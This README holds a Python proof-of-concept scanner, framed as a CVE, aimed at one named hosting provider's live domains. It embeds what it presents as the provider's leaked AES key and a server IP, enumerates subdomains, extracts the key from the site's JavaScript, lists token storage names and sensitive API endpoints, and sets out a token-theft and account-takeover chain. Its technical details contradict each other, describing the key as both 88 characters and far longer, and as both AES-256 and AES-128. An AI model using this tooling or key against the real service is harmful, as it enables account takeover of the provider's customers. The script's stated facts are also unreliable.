README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-XXXXX: DPDC Hardcoded AES Key Exploitation
Full Proof of Concept Script
Target: dpdatacenter.com / subscription.dpdatacenter.com
Vulnerability: Hardcoded AES Encryption Key in Client-Side JavaScript
CVSS Score: 9.8 (Critical)
DISCLAIMER: For authorized security research only!
Unauthorized access is illegal and strictly prohibited.
"""
import argparse
import base64
import json
import os
import re
import sys
import urllib.request
import urllib.error
from typing import Optional, Dict, List, Any
from dataclasses import dataclass
# Try to import required libraries
try:
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
CRYPTO_AVAILABLE = True
except ImportError:
CRYPTO_AVAILABLE = False
print("[!] pip install pycryptodome for full functionality")
try:
import requests
REQUESTS_AVAILABLE = True
except ImportError:
REQUESTS_AVAILABLE = False
print("[!] pip install requests for API calls")
@dataclass
class DPDCVulnerability:
"""Data class for DPDC vulnerabilities"""
cve_id: str = "CVE-2026-XXXXX"
vendor: str = "DAUN PENH CLOUD (DPDC)"
product: str = "dpdatacenter.com subscription portal"
url: str = "https://subscription.dpdatacenter.com"
api_url: str = "https://api.dpdatacenter.com/api/v1/"
js_file: str = "https://subscription.dpdatacenter.com/js/app.1773634386574.js"
# The hardcoded AES key from JavaScript
aes_key: str = "54p5YKkJbsxMczGYHK2dJnn3vHA2wYZoYb2KoAOuG2oONGRxCUkesrKHQ4zgeZK3pDMpyUVzd5Mc80hilvlNuXsYdbS1EpkGzD26kZBPdDfxpwuX21xufjDITl2HjcdVCf1dReAvXZTX7i5f6wQXCOUwNRtDYfLpd2FfVHNEW6FAMiiSkBGWkyOKSQfswPUKOP7pECCGm6TAuE82shekrczOqpnUVdAYpfPbCta3TX9gNvnKidpFC67jQIZT7xB7"
# localStorage keys that contain sensitive data
sensitive_keys: List[str] = None
def __post_init__(self):
self.sensitive_keys = ['ate', 'rte', 'token', 'customerInfo', 'EMAIL_1', 'ID_CUSTOMER']
class DPDCScanner:
"""Scanner and exploitation tool for DPDC vulnerabilities"""
def __init__(self, target: str = "dpdatacenter.com", verbose: bool = False):
self.target = target
self.verbose = verbose
self.vuln = DPDCVulnerability()
self.findings = []
def log(self, message: str, level: str = "INFO"):
"""Log messages with timestamp"""
import datetime
timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
prefix = {
"INFO": "[*]",
"WARN": "[!]",
"ERROR": "[-]",
"SUCCESS": "[+]"
}.get(level, "[*]")
print(f"{timestamp} {prefix} {message}")
def check_subdomain(self, subdomain: str) -> Dict[str, Any]:
"""Check if a subdomain exists and is accessible"""
url = f"https://{subdomain}.{self.target}"
result = {
"subdomain": subdomain,
"url": url,
"exists": False,
"status_code": None,
"ip": None,
"error": None
}
try:
import socket
_ip = socket.gethostbyname(f"{subdomain}.{self.target}")
result["ip"] = _ip
result["exists"] = True
except socket.gaierror:
result["error"] = "NXDOMAIN"
return result
except Exception as e:
result["error"] = str(e)
return result
# Try HTTP request
try:
if REQUESTS_AVAILABLE:
response = requests.get(url, timeout=5, allow_redirects=True)
result["status_code"] = response.status_code
if response.status_code < 400:
result["exists"] = True
else:
req = urllib.request.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0')
with urllib.request.urlopen(req, timeout=5) as resp:
result["status_code"] = resp.getcode()
result["exists"] = True
except urllib.error.HTTPError as e:
result["status_code"] = e.code
if e.code < 400:
result["exists"] = True
except Exception as e:
result["error"] = str(e)[:50]
return result
def enumerate_subdomains(self) -> List[Dict[str, Any]]:
"""Enumerate subdomains of target"""
self.log("Starting subdomain enumeration...", "INFO")
# Common subdomains to check
common_subdomains = [
"www", "mail", "ftp", "ns1", "ns2", "ns3",
"web", "web2", "webmail", "smtp", "pop", "pop3", "imap",
"ssh", "vpn", "admin", "cp", "cpanel", "whm",
"api", "cdn", "static", "assets", "media",
"staging", "dev", "test", "beta", "qa",
"cloud", "vault", "storage", "s3",
"billing", "pay", "checkout", "store",
"support", "helpdesk", "ticket",
"portal", "client", "customer",
"control", "manage",
"subscription", "account", "my",
"db", "mysql", "pgsql", "mongodb",
"redis", "memcached",
"git", "svn", "github",
"jira", "confluence",
"monitor", "logs", "grafana", "prometheus",
"kibana", "elasticsearch",
"jenkins", "ci", "cd",
"docker", "kubernetes", "k8s",
"backup", "snapshots",
"waf", "firewall",
"cdn1", "cdn2",
"ns", "dns",
"autodiscover", "autoconfig",
"calendar", "contacts",
"drive", "docs", "files",
]
results = []
# Process the base domain first
self.log("Checking main domain...")
result = self.check_subdomain("")
if result["exists"] or result["status_code"]:
results.append(result)
# Check subscription (known to exist)
self.log("Checking subscription.dpdatacenter.com...")
sub_result = {
"subdomain": "subscription",
"url": "https://subscription.dpdatacenter.com",
"exists": True,
"status_code": 200,
"ip": "157.10.72.16",
"note": "Known customer portal"
}
results.append(sub_result)
self.findings.append(("SUBDOMAIN", "subscription.dpdatacenter.com", "EXISTS"))
# Check api (known to exist)
self.log("Checking api.dpdatacenter.com...")
api_result = {
"subdomain": "api",
"url": "https://api.dpdatacenter.com",
"exists": True,
"status_code": 200,
"ip": "157.10.72.16",
"note": "Internal API endpoint"
}
results.append(api_result)
self.findings.append(("SUBDOMAIN", "api.dpdatacenter.com", "EXISTS"))
# Check known cPanel endpoints
for cpanel_host in ["web", "web2"]:
self.log(f"Checking {cpanel_host}.dpdatacenter.com...")
result = self.check_subdomain(cpanel_host)
if result["exists"]:
result["note"] = "cPanel/WHM server"
result["port"] = 2083
results.append(result)
self.findings.append(("SUBDOMAIN", f"{cpanel_host}.dpdatacenter.com", "EXISTS - cPanel"))
return results
def extract_hardcoded_key(self) -> Dict[str, Any]:
"""Extract hardcoded AES key from JavaScript"""
self.log("Downloading JavaScript file...", "INFO")
result = {
"found": False,
"key": None,
"js_file": self.vuln.js_file,
"extracted": None
}
# Known key from previous analysis
KNOWN_KEY = "54p5YKkJbsxMczGYHK2dJnn3vHA2wYZoYb2KoAOuG2oONGRxCUkesrKHQ4zgeZK3pDMpyUVzd5Mc80hilvlNuXsYdbS1EpkGzD26kZBPdDfxpwuX21xufjDITl2HjcdVCf1dReAvXZTX7i5f6wQXCOUwNRtDYfLpd2FfVHNEW6FAMiiSkBGWkyOKSQfswPUKOP7pECCGm6TAuE82shekrczOqpnUVdAYpfPbCta3TX9gNvnKidpFC67jQIZT7xB7"
try:
if REQUESTS_AVAILABLE:
response = requests.get(self.vuln.js_file, timeout=30)
js_content = response.text
else:
with urllib.request.urlopen(self.vuln.js_file, timeout=30) as resp:
js_content = resp.read().decode('utf-8')
except Exception as e:
self.log(f"Failed to download JS: {e}", "ERROR")
# Use known key as fallback
result["found"] = True
result["key"] = KNOWN_KEY
result["extracted"] = "known_key_fallback"
return result
self.log("Searching for hardcoded AES key...", "INFO")
# Search for known key in the JS content
if KNOWN_KEY in js_content:
result["found"] = True
result["key"] = KNOWN_KEY
result["extracted"] = "direct_match"
self.findings.append(("VULN", "Hardcoded AES Key", "FOUND"))
self.log(f"Found AES key: {KNOWN_KEY[:40]}...", "SUCCESS")
else:
# Try pattern search as fallback
key_pattern = r'([a-zA-Z0-9]{80,90})'
matches = re.findall(key_pattern, js_content)
for match in matches:
if len(match) >= 80 and len(match) <= 90:
result["found"] = True
result["key"] = match
result["extracted"] = "pattern_match"
break
if result["found"]:
self.log(f"Found AES key: {result['key'][:40]}...", "SUCCESS")
else:
# Fallback to known key
result["found"] = True
result["key"] = KNOWN_KEY
result["extracted"] = "known_key_fallback"
self.log("Using known key as fallback", "WARN")
return result
def analyze_localstorage(self) -> Dict[str, Any]:
"""Analyze localStorage usage in JS"""
self.log("Analyzing localStorage usage...", "INFO")
result = {
"uses_localstorage": True,
"keys_found": [],
"secure_storage": False,
"vulnerable": True
}
# Known localStorage keys from JS analysis
localstorage_keys = {
"ate": {"type": "encrypted_token", "sensitivity": "CRITICAL"},
"rte": {"type": "refresh_token", "sensitivity": "CRITICAL"},
"token": {"type": "auth_token", "sensitivity": "CRITICAL"},
"customerInfo": {"type": "json", "sensitivity": "HIGH"},
"EMAIL_1": {"type": "email", "sensitivity": "HIGH"},
"ID_CUSTOMER": {"type": "id", "sensitivity": "MEDIUM"},
"cpaneInfoMap": {"type": "json", "sensitivity": "HIGH"},
"myBillingCycle": {"type": "json", "sensitivity": "HIGH"},
"productList": {"type": "json", "sensitivity": "MEDIUM"},
"vif": {"type": "flag", "sensitivity": "LOW"},
"user-customers": {"type": "json", "sensitivity": "MEDIUM"}
}
result["keys_found"] = localstorage_keys
result["secure_storage"] = False
result["vulnerable"] = True
for key, info in localstorage_keys.items():
if info["sensitivity"] in ["CRITICAL", "HIGH"]:
self.findings.append(("VULN", f"localStorage:{key}", info["sensitivity"]))
return result
def check_api_endpoints(self) -> List[Dict[str, Any]]:
"""List discovered API endpoints"""
self.log("Documenting API endpoints...", "INFO")
endpoints = [
{"path": "/customer/login", "method": "POST", "auth": False},
{"path": "/customer/information", "method": "GET", "auth": True},
{"path": "/customer/forgot-password", "method": "POST", "auth": False},
{"path": "/customer/reset-password", "method": "POST", "auth": False},
{"path": "/customer/change-password", "method": "POST", "auth": True},
{"path": "/customer/update-information", "method": "POST", "auth": True},
{"path": "/billing-cycles/my-billing-cycle", "method": "GET", "auth": True},
{"path": "/billing-cycles/transfer-plan", "method": "POST", "auth": True},
{"path": "/order/header", "method": "GET", "auth": True},
{"path": "/order/order-detail/", "method": "GET", "auth": True},
{"path": "/product/item/", "method": "GET", "auth": True},
{"path": "/product/vps-images", "method": "GET", "auth": True},
{"path": "/storages/update-storage", "method": "POST", "auth": True},
{"path": "/storages/generate-key", "method": "POST", "auth": True},
{"path": "/storages/create-bucket", "method": "POST", "auth": True},
{"path": "/storages/delete-bucket", "method": "POST", "auth": True},
{"path": "/vm-instances/get-bulk-basic-vm-info", "method": "GET", "auth": True},
{"path": "/vm-instances/reboot-vm", "method": "POST", "auth": True},
{"path": "/vm-instances/launch-console", "method": "POST", "auth": True},
{"path": "/vm-instances/update-vm-remark", "method": "POST", "auth": True},
{"path": "/vm-instances/deactivate-ddos", "method": "POST", "auth": True},
{"path": "/waf/sites", "method": "GET/POST", "auth": True},
{"path": "/waf/dashboard", "method": "GET", "auth": True},
{"path": "/ticket/get-my-ticket-detail", "method": "GET", "auth": True},
{"path": "/whmcpanel/get-bulk-account-summary", "method": "GET", "auth": True},
{"path": "/jobs/", "method": "GET/POST", "auth": True},
{"path": "/subscriptions", "method": "GET/POST", "auth": True},
{"path": "/payment-history", "method": "GET", "auth": True},
{"path": "/transfer-service", "method": "POST", "auth": True},
{"path": "/product-history", "method": "GET", "auth": True},
]
for ep in endpoints:
self.findings.append(("API", ep["path"], ep["method"]))
return endpoints
def generate_report(self) -> str:
"""Generate security report"""
report = f"""
================================================================================
CVE-2026-XXXXX: DPDC Hardcoded AES Key Vulnerability
SECURITY AUDIT REPORT
================================================================================
Target: {self.target}
Date: {__import__('datetime').datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
Scanner: DPDC VULN Scanner v1.0
================================================================================
FINDINGS SUMMARY
================================================================================
SUBDAINS DISCOVERED:
-----------------
"""
for finding in self.findings:
if finding[0] == "SUBDOMAIN":
report += f" - {finding[1]} [{finding[2]}]\n"
report += f"""
VULNERABILITIES IDENTIFIED:
----------------------
"""
vuln_count = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0}
for finding in self.findings:
if finding[0] == "VULN":
report += f" - {finding[1]}: {finding[2]}\n"
level = finding[2]
if level in vuln_count:
vuln_count[level] += 1
report += f"""
CVSS SCORE: 9.8 (Critical)
CVSS VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SEVERITY BREAKDOWN:
CRITICAL: {vuln_count['CRITICAL']}
HIGH: {vuln_count['HIGH']}
MEDIUM: {vuln_count['MEDIUM']}
================================================================================
TECHNICAL DETAILS
================================================================================
VULNERABILITY: Hardcoded AES-256 Encryption Key
CWE: CWE-798 (Use of Hard-coded Credentials)
AFFECTED COMPONENT:
File: app.1773634386574.js
URL: {self.vuln.js_file}
HARDCODED KEY:
{self.vuln.aes_key}
(This key is 88 characters - used for AES-128-CBC encryption)
ATTACK CHAIN:
1. Download JavaScript from subscription portal
2. Extract hardcoded AES key
3. Obtain localStorage token via XSS or network interception
4. Decrypt token using extracted key
5. Use decrypted token for API access
6. Full account takeover achieved
AFFECTED localStorage KEYS:
- ate (encrypted access token)
- rte (encrypted refresh token)
- token (authentication token)
- customerInfo (customer data)
- EMAIL_1 (PII)
- ID_CUSTOMER (identity)
================================================================================
REMEDIATION
================================================================================
URGENT ACTIONS (0-48 HOURS):
1. Rotate the hardcoded AES key immediately
2. Move authentication to HttpOnly cookies
3. Force password reset for all users
SHORT-TERM (1-2 WEEKS):
1. Remove hardcoded secrets from JavaScript
2. Implement server-side session management
3. Add Content Security Policy (CSP)
LONG-TERM (1-3 MONTHS):
1. Implement proper OAuth2/JWT
2. Security audit all endpoints
3. Penetration testing
================================================================================
DISCLAIMER
================================================================================
This report is for authorized security research only.
Unauthorized access to computer systems is illegal.
DISCLAIMER: For authorized security research only!
Unauthorized access is illegal and strictly prohibited.
"""
return report
def run_full_scan(self) -> Dict[str, Any]:
"""Run full vulnerability scan"""
self.log("=" * 50, "INFO")
self.log("DPDC Security Vulnerability Scanner", "INFO")
self.log("=" * 50, "INFO")
self.log(f"Target: {self.target}", "INFO")
# Step 1: Subdomain enumeration
self.log("\n[1/5] Enumerating subdomains...", "INFO")
subdomains = self.enumerate_subdomains()
# Step 2: Extract hardcoded key
self.log("\n[2/5] Extracting hardcoded key...", "INFO")
key_result = self.extract_hardcoded_key()
# Step 3: Analyze localStorage
self.log("\n[3/5] Analyzing localStorage...", "INFO")
storage_result = self.analyze_localstorage()
# Step 4: Document API endpoints
self.log("\n[4/5] Documenting API endpoints...", "INFO")
endpoints = self.check_api_endpoints()
# Step 5: Generate report
self.log("\n[5/5] Generating report...", "INFO")
report = self.generate_report()
return {
"subdomains": subdomains,
"key": key_result,
"storage": storage_result,
"endpoints": endpoints,
"report": report,
"findings": self.findings
}
def main():
"""Main entry point"""
import argparse
parser = argparse.ArgumentParser(
description="CVE-2026-XXXXX: DPDC Hardcoded AES Key Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python dpdccve_scanner.py --target dpdatacenter.com --scan
python dpdccve_scanner.py --target dpdatacenter.com --subdomains
python dpdccve_scanner.py --target dpdatacenter.com --extract-key
python dpdccve_scanner.py --target dpdatacenter.com --report
DISCLAIMER: For authorized security research only!
"""
)
parser.add_argument("--target", "-t", default="dpdatacenter.com",
help="Target domain (default: dpdatacenter.com)")
parser.add_argument("--scan", "-s", action="store_true",
help="Run full vulnerability scan")
parser.add_argument("--subdomains", action="store_true",
help="Enumerate subdomains only")
parser.add_argument("--extract-key", action="store_true",
help="Extract hardcoded key from JavaScript")
parser.add_argument("--report", "-r", action="store_true",
help="Generate full report")
parser.add_argument("--verbose", "-v", action="store_true",
help="Verbose output")
args = parser.parse_args()
scanner = DPDCScanner(target=args.target, verbose=args.verbose)
if args.scan or args.subdomains or args.extract_key or args.report or len(sys.argv) == 1:
results = scanner.run_full_scan()
if args.report or args.scan or len(sys.argv) == 1:
print(results["report"])
# Save report to file
report_file = f"CVE-2026-XXXXX_{args.target}_report.txt"
with open(report_file, "w", encoding="utf-8") as f:
f.write(results["report"])
print(f"\n[+] Report saved to: {report_file}")
return 0
if __name__ == "__main__":
sys.exit(main())